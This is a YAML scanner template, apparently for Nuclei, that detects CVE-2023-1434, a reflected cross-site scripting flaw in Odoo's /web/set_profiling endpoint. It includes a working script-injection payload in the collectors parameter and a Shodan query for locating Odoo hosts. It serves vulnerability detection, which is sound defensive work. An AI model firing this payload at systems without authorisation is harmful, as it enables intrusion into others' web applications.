id: CVE-2023-1434

info:
  name: Odoo - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.
  reference:
    - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434
  classification:
    cve-id: CVE-2023-1434
    cwe-id: CWE-79
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"Odoo"
  tags: cve,cve2023,odoo,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - '"params":'
          - 'session'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200